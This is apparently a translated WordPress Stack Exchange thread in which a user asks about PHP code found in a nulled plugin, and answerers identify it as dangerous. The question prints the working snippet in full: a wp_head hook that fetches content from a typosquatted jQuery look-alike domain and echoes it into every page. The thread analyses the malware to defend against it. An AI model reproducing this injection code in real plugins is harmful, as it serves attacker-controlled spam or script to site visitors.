Encontrei isso em um plugin. O que isso faz? é perigoso?

17

Encontrei isso em um plugin. O que isso faz? é perigoso?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins wp-admin security curl Sofia Rose
fonte
5
Qual plugin é esse?
Daniel
Você conseguiu o plugin no site oficial do WP?
Esse brasileiro
1
Este estava em um plug-in que um dos meus clientes queria que eu executasse na minha instalação de rede. O plugin queria executar isso no wp-admin. Depois de ler isso, perguntei-lhe de onde veio. É um plugin nulo de um torrent. A resposta curta foi erm NO xXx
Sofia Rose

Respostas:

16

Ele carrega um bloco de marcação contendo spam (pensei em postar um pouco da fonte, mas não quero anunciar o conteúdo de forma alguma) de um domínio que seja um erro de ortografia próximo do domínio-- http://jquery.com/- usado pelo jQuery , uma biblioteca Javascript respeitável e popular e que o WordPress inclui no Core. Eu acho que a idéia é parecer carregar essa biblioteca, quando, de fato, carregar algo muito diferente.

E, de outras formas, parece estar carregando o jQuery. Observe o nome da variável $jquery.

Também pode tentar carregar scripts maliciosos. Eu não verifiquei. Eu iria definitivamente chamá-lo perigoso, especialmente desde que o conteúdo da página pode mudar a qualquer hora do domínio controladores sentir como ele.

Na melhor das hipóteses, isso danificará o seu site, pois os mecanismos de pesquisa olham para sites que espalham spam.

Não use. Não faz nada benéfico para você ou para qualquer outra pessoa na web além das pessoas que administram o site. Se você o encontrou em um site respeitável, informe-o.

s_ha_dum
fonte
7

Sim, é um código perigoso, carregando conteúdo de um site de spam.

Você não nomeou o plug-in, mas se você encontrou esse código depois que ele foi instalado no seu site, é possível que o código do plug-in não tenha vindo do desenvolvedor como esse, mas foi invadido depois que foi instalado. Se for esse o caso, você pode encontrar o código malicioso em mais do seu site do que apenas neste plugin.

Verifique o código do plug-in baixado de onde você obteve o plug-in originalmente e veja se esse código malicioso estava lá originalmente. Caso contrário, seu site foi invadido. Se você determinar que esse é o caso, leia este artigo no Codex .

Ben Miller - Restabelecer Monica
fonte
3
Este estava em um plug-in que um dos meus clientes queria que eu executasse na minha instalação de rede. O plugin queria executar isso no wp-admin. Depois de ler isso, perguntei-lhe de onde veio. É um plugin nulo de um torrent. A resposta curta foi erm NO xXx
Sofia Rose